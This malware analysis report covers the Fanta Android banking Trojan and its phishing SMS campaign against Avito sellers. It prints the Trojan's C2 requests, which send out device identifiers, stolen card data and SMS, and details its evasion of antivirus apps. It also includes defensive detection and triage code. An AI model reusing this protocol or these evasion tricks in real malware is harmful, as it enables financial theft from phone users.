Leysya, Fanta: a new tactic for an old Android Trojan


Suppose you put something up for sale on Avito and, shortly after posting a detailed description of the item (say, a RAM module), you receive an SMS like the one below:

[Screenshot: SMS addressed to the seller by name, with a link]

When you open the link, you see a seemingly innocuous page telling you, the happy and successful seller, that your item has been bought:

[Screenshot: phishing page imitating Avito with the item description and the "sale" amount]

Once you tap the "Continue" button, an APK with a plausible icon and a trustworthy name is downloaded to your Android device. You install it; for some reason it asks for AccessibilityService rights, a couple of windows appear and quickly disappear, and ... that is it.

You go to check your balance, but for some reason your banking application asks for your card details again. After you enter them, something terrible happens: for a reason you still cannot explain, money starts disappearing from your account. You try to fix the problem, but the phone resists: it presses the Back and Home keys on its own, refuses to power off and does not let you turn on any security feature. In the end you are left without money, your item has not been sold, and you are left wondering what just happened.

The answer is simple: you have fallen victim to Fanta, an Android Trojan from the Flexnet family. How did it happen? Let us explain.

Authors: Andrey Polovinkin, Junior Malicious Code Analyst, Ivan Pisarev, Malicious Code Analyst.

Some statistics

The Flexnet family of Android Trojans was first reported back in 2015. Over its long period of activity the family has branched into several variants: Fanta, Limebot, Lipton and others. Neither the Trojan nor the infrastructure around it stands still: new, effective distribution schemes are developed (in this case, high-quality phishing pages aimed at a specific seller), and the developers follow the current trends in malware writing, adding functionality that makes stealing money from infected devices more efficient and that bypasses protection mechanisms.

The campaign described in this article targets users in Russia; a small number of infected devices have been recorded in Ukraine, and even fewer in Kazakhstan and Belarus.

Even though Flexnet has been on the Android Trojan scene for over four years and has been studied extensively by many researchers, it is still in good shape. Since January 2019 the potential damage exceeds 35 million rubles, and that is for the Russian campaigns alone. In 2015 various versions of this Android Trojan were sold on underground forums, where the Trojan's source code with a detailed description could also be found, so worldwide damage is higher still. Not a bad figure for such an old-timer, is it?


From sale to scam

As the screenshot of the phishing page imitating the Avito classifieds service shows, the page was prepared for a specific victim. The attackers apparently use one of the Avito parsers to pull out the seller's phone number and name as well as the item description. After the page is deployed and the APK prepared, the victim receives an SMS with their name and a link to a phishing page containing the description of their item and the amount supposedly received from the "sale". Clicking the button delivers the malicious APK, Fanta.

A look at the shcet491[.]ru domain shows that it is delegated to Hostinger's name servers:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

The zone contains records pointing to the IP addresses 31.220.23[.]236, 31.220.23[.]243 and 31.220.23[.]235, but the apex A record points to the server 178.132.1[.]240.

The IP address 178.132.1[.]240 is located in the Netherlands and belongs to the hoster WorldStream. The IP addresses 31.220.23[.]235, 31.220.23[.]236 and 31.220.23[.]243 are located in the United Kingdom and belong to a Hostinger shared-hosting server. The registrar is openprov-ru. The following domains also resolved to 178.132.1[.]240 (the labels are transliterated Russian: sdelka = deal, vyplata/viplata = payout, perevod = transfer, shcet = invoice):

  • sdelka-ru[.]ru
  • product-av[.]ru
  • av-product[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

Note that links of the following format were served by almost all of these domains:

http://(www.){0,1}<%domain%>/[0-9]{7}

The link from the SMS message fits this template too. Historical data shows that several links matching the pattern correspond to the same domain, which indicates that one domain is used to distribute the Trojan to several victims.
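As an added illustration (not part of the original Group-IB post), the following Python turns the link template above into a hunting check for SMS bodies. It escapes the dot that the template leaves unescaped, requires the seven-digit path to end the URL, and flags links on a subset of the distribution domains listed above; accepting https as well as http is an assumption beyond the report, and the sample SMS is constructed.

```python
import re

# A subset of the distribution domains listed above, in plain (non-defanged)
# form; extend the set with the rest of the report's IOC list as needed.
FANTA_PHISH_DOMAINS = {
    "shcet491.ru", "shcet382.ru", "sdelka-ru.ru",
    "product-av.ru", "av-product.ru", "vyplata437.ru",
}

# The report's template is http://(www.){0,1}<%domain%>/[0-9]{7}. As a real
# regex the dot in "www." must be escaped and the seven-digit path must end
# the URL, otherwise an eight-digit path would match as well. Accepting https
# is an assumption beyond the report, which only shows http links.
LINK_RE = re.compile(
    r"https?://(?:www\.)?([a-z0-9][a-z0-9.-]*\.[a-z]{2,})/(\d{7})(?![\w/])",
    re.IGNORECASE,
)


def extract_fanta_links(text, known_domains=FANTA_PHISH_DOMAINS):
    """Return one record per link in an SMS body that fits the Fanta link template.

    A hit on a known domain is a confirmed IOC; a hit on an unknown domain is a
    pattern-only match worth reviewing, since the operators rotate domains.
    """
    hits = []
    for m in LINK_RE.finditer(text):
        domain = m.group(1).lower()
        hits.append({
            "url": m.group(0),
            "domain": domain,
            "victim_id": m.group(2),            # 7-digit per-victim page id
            "known_domain": domain in known_domains,
        })
    return hits


# Constructed sample SMS (not a real message from the campaign).
SAMPLE_SMS = "Ivan, your item has been purchased. Payout: http://shcet491.ru/1234567"

if __name__ == "__main__":
    for hit in extract_fanta_links(SAMPLE_SMS):
        print(hit)
```

Pattern-only hits (a seven-digit path on an unknown domain) are deliberately returned rather than dropped: the domain list is the part of this campaign that changes fastest.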

Jumping ahead a little: the Trojan downloaded from the SMS link uses onuseseddohap[.]club as its control server. The domain was registered on 2019-03-12, and APK applications have been communicating with it since 2019-04-29. According to VirusTotal data, a total of 109 applications interacted with this server. The domain resolves to the IP address 217.23.14[.]27, located in the Netherlands and owned by the hoster WorldStream; the registrar is Namecheap. The domains bad-racoon[.]club (since 2018-09-25) and bad-racoon[.]live (since 2018-10-25) have also resolved to this IP address; more than 80 APK files interacted with bad-racoon[.]club and more than 100 with bad-racoon[.]live.

Overall, the attack proceeds as follows: the attackers parse the victim's Avito listing, send an SMS with a personalized link, serve a phishing page that imitates the completed sale, deliver the APK from it, and the installed Trojan registers with the control server and starts receiving commands.

What does Fanta have under the lid?

Like many other Android Trojans, Fanta can read and send SMS messages, make USSD requests and display its own windows on top of other applications (including banking ones). The family's arsenal has grown, however: Fanta now uses the Accessibility Service for several purposes, among them reading the contents of other applications' notifications and preventing the Trojan from being detected or stopped on the infected device. Fanta works on Android 4.4 and later. In this article we take a closer look at the following Fanta sample:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Immediately after launch

Immediately after launch, the Trojan hides its icon. It runs only if the device name is not on the following list (a crude emulator and test-device check):

  • android_x86
  • VirtualBox
  • Nexus 5X (bullhead)
  • Nexus 5 (razor)

This check is performed in the Trojan's main service, MainService. On first launch the application initializes its configuration parameters with default values (the configuration storage format and the meaning of the parameters are described later) and registers the new infected device with the control server. An HTTP POST request with the message type register_bot and information about the infected device (Android version, IMEI, phone number, operator name and the code of the country in which the operator is registered) is sent to hXXp://onuseseddohap[.]club/controller.php. In response, the server returns a message with the fields bot_id, bot_pwd and server, which the application saves as its CnC parameters. The server field is optional: if it is absent, Fanta keeps using the registration address, hXXp://onuseseddohap[.]club/controller.php. Being able to change the CnC address solves two problems for the operators: spreading the load across several servers (with a large number of infected devices the load on an unoptimized web server can be high) and failing over to an alternative server if one CnC goes down.

If an error occurs while sending the request, the Trojan retries registration after 20 seconds.

After registering the device, Fanta shows the user the following message:

[Screenshot: dialog asking the user to enable the "System Security" service]

Note that "System Security" is the name of the Trojan's accessibility service. After the user taps OK, the device's Accessibility settings open, where the user must grant Accessibility rights to the malicious service themselves:

[Screenshot: Accessibility settings listing the "System Security" service]

Once the user turns the Accessibility Service on, Fanta can read the contents of application windows and the actions performed in them:

[Screenshot: Accessibility permission description shown to the user]

Immediately after obtaining Accessibility rights, the Trojan requests device administrator rights and permission to read notifications:

[Screenshot: device administrator and notification access prompts]

Using the AccessibilityService, the application simulates the taps and thereby grants itself all the rights it needs.

Fanta creates several databases (described later) to store its configuration and the information collected from the infected device. To exfiltrate the collected data, the Trojan schedules a recurring task that uploads rows from the database and fetches a command from the control server. The polling interval depends on the Android version: 10 seconds on Android 5.1, 60 seconds otherwise.

To receive a command, Fanta sends a GetTask request to the control server. In response, the CnC can send one of the following commands:

Command  Description
0        Send an SMS message
1        Make a phone call or send a USSD command
2        Update the interval parameter
3        Update the intercept parameter
6        Update the smsManager parameter
9        Start collecting SMS messages
11       Reset the phone to factory settings
12       Enable/disable logging of dialog-box creation

Fanta also collects notifications from about 70 banking, fast-payment and e-wallet applications and stores them in its database.

Storage of configuration parameters

To store its configuration, Fanta uses the standard Android mechanism, SharedPreferences files. The settings are saved in a file named settings; the parameters are described below.

  • id (default 0; integer): bot ID
  • server (default hXXp://onuseseddohap[.]club/; URL): control server address
  • pwd (default empty; string): server password
  • interval (default 20; integer): time interval, in seconds, that delays the following tasks:
    · sending a status request about an SMS message that was sent
    · fetching a new command from the control server
  • intercept (default ALL; values ALL or a phone number): if the field equals the string ALL, or equals the sender's number, the received SMS message is intercepted by the application and not shown to the user
  • smsManager (default 0; values 0/1): enable/disable the application as the default SMS handler
  • readDialog (default false; values true/false): enable/disable logging of accessibility events

Fanta also uses a preferences file named smsManager with a single parameter:

  • pckg (string): package name of the SMS manager in use

Database interaction

The Trojan uses two databases. The database named a stores the various information collected from the phone. The second, fanta.db, stores the settings that control the creation of the phishing windows used to collect bank card data.

The Trojan writes the collected information and its own action log to the table logs in database a. The table is created with the following SQL statement:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

The table holds the following kinds of records:

1. The device powering on, logged with the message Phone turned on!

2. Notifications from applications, formed according to the template:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Bank card data entered into the phishing forms created by the Trojan. VIEW_NAME is one of:

  • AliExpress
  • Avito
  • Google Play
  • Miscellaneous <%App Name%>

The message is logged in the format (the Russian literals are the Trojan's own strings: Номер карты = card number, Дата = date):

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Incoming and outgoing SMS messages, in the format (Тип: Входящее/Исходящее = type: incoming/outgoing):

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Information about the package that created a dialog box, in the format:

(<%Package name%>)<%Package information%>

[Screenshot: example rows of the logs table]
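To show how the logs table can be triaged when an infected device is examined, here is an added Python example (it is not code from the original post, nor from the malware). It creates the table with the exact schema quoted above, loads a few constructed rows in the formats just described, classifies each row by template, and masks the card number so that the triage output is not itself full card data. The regular expressions are written from the templates in the text; the sample rows are constructed, not real victim data.

```python
import re
import sqlite3
from datetime import datetime

# Table schema exactly as the report quotes it from the Trojan (database "a").
LOGS_SCHEMA = ("create table logs ( _id integer primary key autoincrement, "
               "d TEXT, f TEXT, p TEXT, m integer)")

TS_FMT = "%H:%M:%S %d.%m.%Y"   # "HH:mm:ss dd.MM.yyyy" in the report's notation

# Row templates from the report. The Russian literals are the Trojan's own
# strings: "Номер карты" = card number, "Дата" = date,
# "Тип: Входящее/Исходящее" = type: incoming/outgoing.
CARD_RE = re.compile(r"^\[(?P<ts>[^\]]+)\]\((?P<view>.+?)\) Номер карты:(?P<pan>[^;]*); "
                     r"Дата:(?P<month>[^/]+)/(?P<year>[^;]+); CVV: ?(?P<cvv>\S*)$")
SMS_RE = re.compile(r"^\(\[(?P<ts>[^\]]+)\] Тип: (?P<dir>Входящее|Исходящее)\) "
                    r"(?P<number>[^:]*):(?P<text>.*)$", re.S)
NOTIF_RE = re.compile(r"^\((?P<app>[^)]+)\)(?P<title>[^:]*): (?P<text>.*)$", re.S)
PKG_RE = re.compile(r"^\((?P<package>[^)]+)\)(?P<info>.*)$", re.S)


def mask_pan(pan):
    """Keep only the first 6 and last 4 digits so the triage report is not card data."""
    digits = re.sub(r"\D", "", pan)
    if len(digits) < 10:
        return "*" * len(digits)
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]


def classify_row(d):
    """Map one value of column d to (kind, fields). Most specific template first:
    the notification and dialog templates both start with "(...)" and are told
    apart only by the ": " separator, so they are tried last."""
    if d == "Phone turned on!":
        return "power_on", {}
    m = CARD_RE.match(d)
    if m:
        f = m.groupdict()
        f["pan"] = mask_pan(f["pan"])
        f["ts"] = datetime.strptime(f["ts"], TS_FMT).isoformat()
        return "card", f
    m = SMS_RE.match(d)
    if m:
        f = m.groupdict()
        f["dir"] = "incoming" if f["dir"] == "Входящее" else "outgoing"
        f["ts"] = datetime.strptime(f["ts"], TS_FMT).isoformat()
        return "sms", f
    m = NOTIF_RE.match(d)
    if m:
        return "notification", m.groupdict()
    m = PKG_RE.match(d)   # "(package)info" without ": " is the readDialog log line
    if m:
        return "dialog", m.groupdict()
    return "unknown", {"raw": d}


def triage_logs(conn):
    """Return one classified record per row of table logs, in insertion order."""
    records = []
    for _id, d, f, p, m in conn.execute("select _id, d, f, p, m from logs order by _id"):
        kind, fields = classify_row(d)
        records.append({"id": _id, "kind": kind, "p": p, "m": m, **fields})
    return records


def build_sample_db():
    """Constructed in-memory database (not real victim data) in the report's formats."""
    conn = sqlite3.connect(":memory:")
    conn.execute(LOGS_SCHEMA)
    rows = [
        ("Phone turned on!", "", "", 0),
        ("(Bank App)Payment: Card *1234 charged 5000 RUB", "", "", 0),
        ("[12:34:56 05.08.2019](Avito) Номер карты:4111111111111111; Дата:12/22; CVV: 123",
         "", "", 0),
        ("([12:35:10 05.08.2019] Тип: Входящее) +79000000000:Your code is 1234",
         "", "+79000000000", 1),
        ("(com.example.settings)Settings dialog", "", "", 0),
    ]
    conn.executemany("insert into logs (d, f, p, m) values (?, ?, ?, ?)", rows)
    return conn


if __name__ == "__main__":
    for rec in triage_logs(build_sample_db()):
        print(rec)
```

On a real device image the same function is pointed at the extracted a database instead of build_sample_db(); the only columns the Trojan actually populates are d, p and m, which is why f is carried along but not interpreted.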
One of Fanta's functions is collecting bank card data. The data is collected through phishing windows shown when banking and other targeted applications are opened. The Trojan shows each phishing window only once; whether a window has already been shown to the user is recorded in the table settings of the database fanta.db, created with the following SQL statement:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

All fields of the settings table are initialized to 1 (show the phishing window) by default. After the user enters their data, the corresponding field is set to 0. The fields are:

  • can_login: controls the form shown when a banking application is opened
  • first_bank: not used
  • can_avito: controls the form shown when the Avito application is opened
  • can_ali: controls the form shown when the AliExpress application is opened
  • can_another: controls the form shown when any application from this list is opened: Yula, Pandao, Drom Auto, Wallet. Discount and bonus cards, Aviasales, Booking, Trivago
  • can_card: controls the form shown when Google Play is opened

Interaction with the control server

Network communication with the control server uses plain HTTP; Fanta uses the popular Retrofit library for networking. Requests are sent to hXXp://onuseseddohap[.]club/controller.php, although the server address can be changed during registration. The server may return a cookie, which is replayed in later requests. Fanta makes the following requests:

  • Bot registration on the control server, performed once at first launch. The following data about the infected device is sent:
    · Cookie: cookies received from the server (empty string by default)
    · mode: the string constant register_bot
    · prefix: the integer constant 2
    · version_sdk: formed according to the template <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
    · imei: IMEI of the infected device
    · country: ISO code of the country in which the operator is registered
    · number: phone number
    · operator: operator name

    An example of a request sent to the server:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 144
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
    

    In response, the server returns a JSON object with the following parameters:
    bot_id: identifier of the infected device. If bot_id is 0, Fanta repeats the request.
    bot_pwd: password for the server.
    server: address of the control server. Optional; if absent, the address already saved in the application is used.

    JSON object example:

    {
        "response":[
       	 {
       		 "bot_id": <%BOT_ID%>,
       		 "bot_pwd": <%BOT_PWD%>,
       		 "server": <%SERVER%>
       	 }
        ],
        "status":"ok"
    }

  • Request for a command from the server. The following data is sent:
    · Cookie: cookies received from the server
    · bid: id of the infected device received in response to register_bot
    · pwd: password for the server
    · divice_admin (sic): whether device administrator rights have been obtained, 1 if so, otherwise 0
    · Accessibility: status of the Accessibility Service, 1 if the service is running, otherwise 0
    · SMSManager: whether the Trojan is set as the default SMS application
    · screen: screen state, 1 if the screen is on, otherwise 0

    An example of a request sent to the server:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Depending on the command, the server returns a JSON object with different parameters:

    · Command 0, send an SMS message: the parameters carry the phone number, the text of the SMS and the identifier of the message to be sent. The identifier is later reported back to the server in a setSmsStatus message.

    {
        "response":
        [
       	 {
       		 "mode": 0,
       		 "sms_number": <%SMS_NUMBER%>,
       		 "sms_text": <%SMS_TEXT%>,
       		 "sms_id": %SMS_ID%
       	 }
        ],
        "status":"ok"
    }

    · Command 1, make a phone call or run a USSD command: the phone number or USSD code arrives in the response body.

    {
        "response":
        [
       	 {
       		 "mode": 1,
       		 "command": <%TEL_NUMBER%>
       	 }
        ],
        "status":"ok"
    }

    · Command 2, change the interval parameter.

    {
        "response":
        [
       	 {
       		 "mode": 2,
       		 "interval": <%SECONDS%>
       	 }
        ],
        "status":"ok"
    }

    · Command 3, change the intercept parameter.

    {
        "response":
        [
       	 {
       		 "mode": 3,
       		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
       	 }
        ],
        "status":"ok"
    }

    · Command 6, change the smsManager parameter.

    {
        "response":
        [
       	 {
       		 "mode": 6,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

    · Command 9, collect SMS messages from the infected device.

    {
        "response":
        [
       	 {
       		 "mode": 9
       	 }
        ],
        "status":"ok"
    }

    · Command 11, reset the phone to factory settings:

    {
        "response":
        [
       	 {
       		 "mode": 11
       	 }
        ],
        "status":"ok"
    }

    · Command 12, change the readDialog setting.

    {
        "response":
        [
       	 {
       		 "mode": 12,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

  • Sending a message of type setSmsStatus. This request is made after the Send SMS message command has been executed. The request looks like this:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Uploading the contents of the database. One row is sent per request. The following data is sent:
    · Cookie: cookies received from the server
    · mode: the string constant setSaveInboxSms
    · bid: id of the infected device received in response to register_bot
    · text: text of the current record (field d of table logs in database a)
    · number: number associated with the current record (field p of table logs in database a)
    · sms_mode: integer value (field m of table logs in database a)

    The request looks like this:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    Once the row has been delivered, it is deleted from the table. Example of the JSON object returned by the server:

    {
        "response":[],
        "status":"ok"
    }
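The request and response formats above are simple enough to decode offline from a proxy log or a PCAP, which is what a detection engineer wants when confirming an infection or watching what commands a C2 issues. The following Python is an added example written for this article (not code from the original post and not part of Fanta itself): it decodes the form-encoded request bodies and the JSON replies shown above, handles the bot_id = 0 retry case and the optional server switch, and names the getTask commands by their number. The sample exchanges are constructed in the documented format, not real captures.

```python
import json
from urllib.parse import parse_qs

# Command numbers from the getTask table above.
COMMANDS = {
    0: "send_sms", 1: "call_or_ussd", 2: "set_interval", 3: "set_intercept",
    6: "set_sms_manager", 9: "collect_sms", 11: "factory_reset",
    12: "set_read_dialog",
}


def parse_request(body):
    """Decode one application/x-www-form-urlencoded POST body to controller.php."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    mode = fields.get("mode")
    out = {"mode": mode, "fields": fields}
    if mode == "register_bot":
        # version_sdk is "<Build.MODEL>/<Build.VERSION.RELEASE>(Avit)"
        model, _, rest = fields.get("version_sdk", "").partition("/")
        out.update(model=model, release=rest.split("(", 1)[0],
                   imei=fields.get("imei"), number=fields.get("number"))
    elif mode == "getTask":
        out.update(
            bot_id=fields.get("bid"),
            device_admin=fields.get("divice_admin") == "1",  # sic, as in the protocol
            accessibility=fields.get("Accessibility") == "1",
            sms_manager=fields.get("SMSManager") == "1",
            screen_on=fields.get("screen") == "1",
        )
    return out


def parse_response(text, request_mode):
    """Decode the JSON reply into (event, details) tuples."""
    data = json.loads(text)
    if data.get("status") != "ok":
        return [("server_error", data)]
    events = []
    for item in data.get("response", []):
        if request_mode == "register_bot":
            # bot_id 0 means "not accepted": the bot repeats the registration request
            if str(item.get("bot_id", "0")) == "0":
                events.append(("registration_retry", item))
            else:
                events.append(("registered", {
                    "bot_id": item["bot_id"],
                    "server": item.get("server"),   # optional CnC switch
                }))
        else:
            mode = item.get("mode")
            name = COMMANDS.get(mode, "unknown_mode_%s" % mode)
            events.append((name, {k: v for k, v in item.items() if k != "mode"}))
    return events


def decode_exchange(request_body, response_text):
    """Pair a request body with the server's reply and return both decoded."""
    req = parse_request(request_body)
    return {"request": req, "events": parse_response(response_text, req["mode"])}


# Constructed sample traffic in the format shown above (not a real capture).
SAMPLE_REGISTER_REQ = ("mode=register_bot&prefix=2&version_sdk=Nexus+6P%2F8.1.0(Avit)"
                       "&imei=000000000000000&country=ru&number=%2B79000000000"
                       "&operator=TestOperator")
SAMPLE_REGISTER_RESP = ('{"response":[{"bot_id": 17, "bot_pwd": "s3cr3t", '
                        '"server": "http://cnc.example.invalid/controller.php"}],'
                        '"status":"ok"}')
SAMPLE_TASK_REQ = ("mode=getTask&bid=17&pwd=s3cr3t&divice_admin=1&Accessibility=1"
                   "&SMSManager=0&screen=0")
SAMPLE_TASK_RESP = ('{"response":[{"mode": 0, "sms_number": "+79001234567", '
                    '"sms_text": "test", "sms_id": 5}],"status":"ok"}')

if __name__ == "__main__":
    print(decode_exchange(SAMPLE_REGISTER_REQ, SAMPLE_REGISTER_RESP))
    print(decode_exchange(SAMPLE_TASK_REQ, SAMPLE_TASK_RESP))
```

Unknown mode numbers are reported rather than dropped, since the command table above skips several values and a new build may fill them in; a "registered" event carrying a server value is the moment the bot moves to a different CnC host, which is worth alerting on separately.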

Interaction with AccessibilityService

AccessibilityService exists to make Android devices easier to use for people with disabilities. Interacting with an application normally requires physical input; AccessibilityService lets an app perform those interactions programmatically. Fanta uses it to create fake windows over banking applications and to stop the user from opening system settings and certain applications.

Using the AccessibilityService, the Trojan monitors changes to elements on the screen of the infected device. As described above, Fanta's settings contain the readDialog parameter, which controls the logging of dialog-box operations; if it is set, the name and description of the package that generated the event are written to the database. When events fire, the Trojan acts as follows:

  • It simulates Back and Home key presses:
    · if the user tries to reboot the device
    · if the user tries to uninstall the "Avito" application or change its permissions
    · if the "Avito" application is mentioned on the page
    · when "Google Play Protect" is opened
    · when a page with AccessibilityService settings is opened
    · when the System Security dialog box appears
    · when the "Draw over other apps" settings page is opened
    · when the pages "Applications", "Backup and Reset", "Data Reset", "Reset Settings", "Developer panel", "Accessibility" (under either its Russian or English title) or "Special permissions" are opened
    · if the event was generated by one of the applications below.

    Application List

    • android
    • Master Lite
    • Clean Master
    • Clean Master for x86 CPU
    • Meizu Application Permission Management
    • MIUI Security
    • Clean Master - Antivirus & Cache & Junk Cleaner
    • Parental control and GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Web Security Beta
    • Virus Cleaner, Antivirus, Cleaner (MAX Security)
    • Mobile AntiVirus Security PRO
    • Avast antivirus & free protection 2019
    • Mobile Security MegaFon
    • AVG Protection for Xperia
    • Mobile Security
    • Malwarebytes antivirus & protection
    • Antivirus for Android 2019
    • Security Master - Antivirus, VPN, AppLock, Booster
    • AVG antivirus for tablet Huawei System Manager
    • Samsung Accessibility
    • Samsung Smart Manager
    • SecurityMaster
    • Speed booster
    • Dr.Web
    • Dr Web Security Space
    • Dr.Web Mobile Control Center
    • Dr Web Security Space Life
    • Dr.Web Mobile Control Center
    • Antivirus & Mobile Security
    • Kaspersky Internet Security: Anti-Virus and Protection
    • Kaspersky Battery Life: Saver & Booster
    • Kaspersky Endpoint Security - protection and management
    • AVG Antivirus free 2019 - Protection for Android
    • Android antivirus
    • Norton Mobile Security and Antivirus
    • Antivirus, firewall, VPN, mobile security
    • Mobile Security: Antivirus, VPN, Anti-Theft
    • Antivirus for Android

  • If a permission prompt appears when an SMS is sent to a short number, Fanta simulates ticking the "Remember choice" checkbox and tapping "Send".
  • When the user tries to revoke the Trojan's administrator rights, it locks the phone screen.
  • It prevents new device administrators from being added.
  • If the Dr.Web antivirus detects a threat, Fanta simulates tapping "Ignore".
  • It simulates Back and Home key presses if the event was generated by the Samsung Device Care application.
  • Fanta shows phishing windows with bank card entry forms when any of about 30 Internet-service applications is launched, among them AliExpress, Booking, Avito, the Google Play Market component, Pandao and Drom Auto.

Phishing Forms

Fanta watches which applications are running on the infected device. If an application of interest is opened, the Trojan displays, on top of everything else, a phishing window with a form for entering bank card details. The user is asked for:

  • Card number
  • Card expiry date
  • CVV
  • Cardholder's name (not for all banks)

Different phishing windows are shown depending on the running application. Some examples:

AliExpress:

[Screenshot: AliExpress-themed card entry form]

Avito:

[Screenshot: Avito-themed card entry form]

For some other applications, such as Google Play Market, Aviasales, Pandao, Booking and Trivago:

[Screenshot: generic card entry form]

How it really was

Fortunately, the person who received the SMS described at the beginning of this article turned out to be a cybersecurity specialist, so the real story differs from the dramatized version: the recipient found the SMS interesting and passed it to the Group-IB Threat Hunting Intelligence team, and the result of the attack is this article. A happy ending, right? Not every story ends so well, though. To keep yours from turning into the dramatized version, with real money lost, it is usually enough to follow these long-established rules:

  • do not install apps on your Android device from any source other than Google Play
  • when installing an application, pay close attention to the permissions it requests
  • pay attention to the extensions of downloaded files
  • install Android OS updates regularly
  • do not visit suspicious resources and do not download files from them
  • do not follow links received in SMS messages.

Source: habr.com
